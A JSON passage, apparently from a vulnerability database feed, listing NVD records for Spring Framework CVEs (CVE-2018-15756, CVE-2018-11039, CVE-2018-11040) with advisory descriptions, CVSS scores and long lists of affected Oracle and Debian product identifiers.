"cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:insurance_rules_palette:11.2.0", "cpe:/a:oracle:retail_markdown_optimization:13.4.4", "cpe:/a:oracle:primavera_gateway:17.12", "cpe:/a:oracle:communications_unified_inventory_management:7.3", "cpe:/a:oracle:retail_integration_bus:16.0.3", "cpe:/a:oracle:retail_integration_bus:15.0", "cpe:/a:oracle:retail_predictive_application_server:15.0.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.0", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:insurance_rules_palette:11.0", "cpe:/a:oracle:insurance_calculation_engine:9.7", "cpe:/a:oracle:communications_element_manager:8.2.0", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:flexcube_private_banking:12.0.1", "cpe:/a:oracle:retail_order_broker:5.1", "cpe:/a:oracle:retail_predictive_application_server:15.0.3.100", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:healthcare_master_person_index:4.0.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2", "cpe:/a:oracle:primavera_analytics:18.8", "cpe:/a:oracle:enterprise_manager_for_fusion_applications:13.3.0.0", "cpe:/a:oracle:retail_invoice_matching:13.1", "cpe:/a:oracle:tape_library_acsls:8.5", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:communications_diameter_signaling_router:8.0.0", "cpe:/a:oracle:insurance_calculation_engine:10.0", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:11.0", "cpe:/a:oracle:communications_session_route_manager:8.1.1", "cpe:/a:oracle:mysql_enterprise_monitor:4.0.12", "cpe:/a:oracle:retail_assortment_planning:15.0", "cpe:/a:oracle:retail_invoice_matching:13.2", "cpe:/a:oracle:rapid_planning:12.2", "cpe:/a:oracle:insurance_rules_palette:11.0.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.2.4", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:retail_predictive_application_server:14.0.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:11.2.0", "cpe:/a:oracle:retail_financial_integration:14.0", "cpe:/a:oracle:retail_invoice_matching:14.0", "cpe:/a:oracle:agile_plm:9.3.6", "cpe:/a:oracle:endeca_information_discovery_integrator:3.2.0", "cpe:/a:oracle:communications_converged_application_server_-_service_controller:6.0", "cpe:/a:oracle:insurance_calculation_engine:10.1", "cpe:/a:oracle:communications_element_manager:8.1.1", "cpe:/a:oracle:insurance_rules_palette:10.2.0", "cpe:/a:oracle:communications_session_route_manager:8.0.0", "cpe:/a:oracle:rapid_planning:12.1", "cpe:/a:oracle:flexcube_private_banking:12.0.3", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:communications_session_report_manager:8.1.1", "cpe:/a:oracle:communications_converged_application_server_-_service_controller:6.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:weblogic_server:12.2.1.4.0", "cpe:/a:oracle:retail_service_backbone:16.0.1", "cpe:/a:oracle:financial_services_analytical_applications_infrastructure:8.0.8", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.20", "cpe:/a:oracle:communications_unified_inventory_management:7.4.0", "cpe:/a:oracle:communications_session_report_manager:8.1.0", "cpe:/a:oracle:retail_order_broker:5.2", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:insurance_rules_palette:10.2.4", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.0", "cpe:/a:oracle:insurance_rules_palette:10.1", "cpe:/a:oracle:retail_service_backbone:16.0", "cpe:/a:oracle:retail_integration_bus:15.0.3", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:goldengate_application_adapters:12.3.2.1.0", "cpe:/a:oracle:retail_service_backbone:15.0", "cpe:/a:oracle:communications_session_report_manager:8.2.0", "cpe:/a:oracle:communications_diameter_signaling_router:8.2.1", "cpe:/a:oracle:retail_predictive_application_server:14.0.3.26", "cpe:/a:oracle:flexcube_private_banking:12.1.0", "cpe:/a:oracle:communications_element_manager:8.2.1", "cpe:/a:oracle:primavera_gateway:15.2", "cpe:/a:oracle:insurance_policy_administration_j2ee:11.1.0", "cpe:/a:oracle:retail_order_broker:15.0", "cpe:/a:oracle:retail_financial_integration:15.0", "cpe:/a:oracle:identity_manager_connector:9.0", "cpe:/a:oracle:retail_invoice_matching:12.0", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:vmware:spring_framework:5.1.0", "cpe:/a:oracle:retail_financial_integration:14.1", "cpe:/a:oracle:retail_financial_integration:16.0", "cpe:/a:oracle:communications_session_route_manager:8.2.0", "cpe:/a:oracle:communications_diameter_signaling_router:8.1", "cpe:/a:oracle:retail_order_broker:16.0", "cpe:/a:oracle:retail_predictive_application_server:14.1.3.37", "cpe:/a:oracle:retail_invoice_matching:14.1", "cpe:/a:oracle:primavera_gateway:18.8.0", "cpe:/a:oracle:communications_session_report_manager:8.0.0", "cpe:/a:oracle:communications_session_route_manager:8.1.0", "cpe:/a:oracle:webcenter_sites:12.2.1.3.0", "cpe:/a:oracle:communications_diameter_signaling_router:8.2", "cpe:/a:oracle:retail_predictive_application_server:14.1.3", "cpe:/a:oracle:primavera_gateway:16.2", "cpe:/a:oracle:retail_assortment_planning:16.0", "cpe:/a:oracle:insurance_rules_palette:11.1.0", "cpe:/a:oracle:communications_brm_-_elastic_charging_engine:12.0", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:retail_integration_bus:16.0", "cpe:/a:oracle:retail_predictive_application_server:16.0.3", "cpe:/a:oracle:insurance_policy_administration_j2ee:10.1", "cpe:/a:oracle:communications_session_route_manager:8.2.1", "cpe:/a:oracle:communications_brm_-_elastic_charging_engine:11.3", "cpe:/a:oracle:communications_session_report_manager:8.2.1", "cpe:/a:oracle:retail_predictive_application_server:16.0"], "id": "CVE-2018-15756", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15756", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:retail_assortment_planning:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:12.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_markdown_optimization:13.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_analytics:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3.100:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_applications:13.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_brm_-_elastic_charging_engine:11.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:spring_framework:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_private_banking:12.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:13.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_brm_-_elastic_charging_engine:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0.3.26:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.20:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:5.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_order_broker:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:9.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_invoice_matching:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:tape_library_acsls:8.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:18.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_manager_connector:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_diameter_signaling_router:8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate_application_adapters:12.3.2.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:35", "description": "Spring Framework (versions 5.0.x prior to 5.0.7, versions 4.3.x prior to 4.3.18, and older unsupported versions) allow web applications to change the HTTP request method to any HTTP method (including TRACE) using the HiddenHttpMethodFilter in Spring MVC. If an application has a pre-existing XSS vulnerability, a malicious user (or attacker) can use this filter to escalate to an XST (Cross Site Tracing) attack.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T15:29:00", "type": "cve", "title": "CVE-2018-11039", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11039"], "modified": "2022-06-23T16:30:00", "cpe": ["cpe:/a:oracle:retail_financial_integration:15.0", "cpe:/a:oracle:communications_unified_inventory_management:7.3.2", "cpe:/a:oracle:enterprise_manager_base_platform:13.2.0.0.0", "cpe:/a:oracle:retail_financial_integration:13.2", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:oracle:weblogic_server:10.3.6.0.0", "cpe:/a:oracle:weblogic_server:12.1.3.0.0", "cpe:/a:oracle:retail_markdown_optimization:13.4.4", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:mysql_enterprise_monitor:3.4.9.4237", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:retail_financial_integration:14.1", "cpe:/a:oracle:agile_plm:9.3.3", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:retail_financial_integration:16.0", "cpe:/a:oracle:communications_unified_inventory_management:7.3.4", "cpe:/a:oracle:retail_predictive_application_server:14.1.3.37", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:communications_unified_inventory_management:7.4.0", "cpe:/a:oracle:agile_plm:9.3.5", "cpe:/a:oracle:retail_assortment_planning:15.0", "cpe:/a:oracle:application_testing_suite:13.1.0.1", "cpe:/a:oracle:retail_customer_insights:16.0", "cpe:/a:oracle:enterprise_manager_base_platform:13.3.0.0.0", "cpe:/a:oracle:communications_network_integrity:7.3.6", "cpe:/a:oracle:endeca_information_discovery_integrator:3.1.0", "cpe:/a:oracle:retail_xstore_point_of_service:7.1", "cpe:/a:oracle:insurance_calculation_engine:10.2", "cpe:/a:oracle:communications_online_mediation_controller:6.1", "cpe:/a:oracle:retail_integration_bus:14.1.2", "cpe:/a:oracle:enterprise_manager_base_platform:12.1.0.5.0", "cpe:/a:oracle:mysql_enterprise_monitor:8.0.2.8191", "cpe:/a:oracle:retail_assortment_planning:16.0", "cpe:/a:oracle:retail_clearance_optimization_engine:14.0.5", "cpe:/a:oracle:healthcare_master_person_index:3.0", "cpe:/a:oracle:utilities_network_management_system:1.12.0.3", "cpe:/a:oracle:retail_assortment_planning:14.1", "cpe:/a:oracle:weblogic_server:12.2.1.3.0", "cpe:/a:oracle:retail_financial_integration:14.0", "cpe:/a:oracle:micros_lucas:2.9.5", "cpe:/a:oracle:mysql_enterprise_monitor:4.0.6.5281", "cpe:/a:oracle:agile_plm:9.3.6", "cpe:/a:oracle:endeca_information_discovery_integrator:3.2.0", "cpe:/a:oracle:health_sciences_information_manager:3.0", "cpe:/a:oracle:agile_plm:9.3.4", "cpe:/a:oracle:insurance_rules_palette:10.0", "cpe:/a:oracle:retail_predictive_application_server:14.0.3.26", "cpe:/a:oracle:enterprise_manager_ops_center:12.3.3", "cpe:/a:oracle:enterprise_manager_for_mysql_database:13.2", "cpe:/a:oracle:hospitality_guest_access:4.2.1", "cpe:/a:oracle:communications_unified_inventory_management:7.3.5", "cpe:/a:oracle:insurance_calculation_engine:11.3.1", "cpe:/a:oracle:hospitality_guest_access:4.2.0", "cpe:/a:oracle:retail_predictive_application_server:15.0.3..100", "cpe:/a:oracle:retail_predictive_application_server:16.0"], "id": "CVE-2018-11039", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11039", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:retail_assortment_planning:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_markdown_optimization:13.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:micros_lucas:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_assortment_planning:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_clearance_optimization_engine:14.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.3.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_xstore_point_of_service:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:healthcare_master_person_index:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_network_management_system:1.12.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:12.1.0.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.0.3.26:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:14.1.3.37:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:8.0.2.8191:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_p6_enterprise_project_portfolio_management:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:3.4.9.4237:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:health_sciences_information_manager:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_mysql_database:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:11.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.2.0.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_predictive_application_server:15.0.3..100:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_financial_integration:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.6.5281:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:agile_plm:9.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_integrator:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.4:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:04:34", "description": "Spring Framework, versions 5.0.x prior to 5.0.7 and 4.3.x prior to 4.3.18 and older unsupported versions, allows web applications to enable cross-domain requests via JSONP (JSON with Padding) through AbstractJsonpResponseBodyAdvice for REST controllers and MappingJackson2JsonView for browser requests. Both are not enabled by default in Spring Framework nor Spring Boot, however, when MappingJackson2JsonView is configured in an application, JSONP support is automatically ready to use through the \"jsonp\" and \"callback\" JSONP parameters, enabling cross-domain requests.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-06-25T15:29:00", "type": "cve", "title": "CVE-2018-11040", "cwe": ["CWE-829"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11040"], "modified": "2022-06-23T16:31:00", "cpe": ["cpe:/a:oracle:communications_unified_inventory_management:7.3.2", "cpe:/a:oracle:flexcube_private_banking:12.1.0.0", "cpe:/o:debian:debian_linux:9.0", "cpe:/a:oracle:enterprise_manager:13.2", "cpe:/a:oracle:retail_advanced_inventory_planning:15.0", "cpe:/a:oracle:flexcube_private_banking:2.0.0.0", "cpe:/a:oracle:product_lifecycle_management:9.3.6", "cpe:/a:oracle:application_testing_suite:13.2.0.1", "cpe:/a:oracle:retail_markdown_optimization:13.4.4", "cpe:/a:oracle:mysql_enterprise_monitor:3.4.9.4237", "cpe:/a:oracle:retail_customer_insights:15.0", "cpe:/a:oracle:application_testing_suite:13.3.0.1", "cpe:/a:oracle:insurance_rules_palette:10.2", "cpe:/a:oracle:communications_unified_inventory_management:7.3.4", "cpe:/a:oracle:retail_service_backbone:16.0.1", "cpe:/a:oracle:retail_predictive_application_server:14.1.3.37", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/a:oracle:healthcare_master_person_index:4.0", "cpe:/a:oracle:flexcube_private_banking:12.0.3.0", "cpe:/a:oracle:communications_unified_inventory_management:7.4.0", "cpe:/a:oracle:flexcube_private_banking:2.2.0.1", "cpe:/a:oracle:agile_product_lifecycle_management:9.3.3", 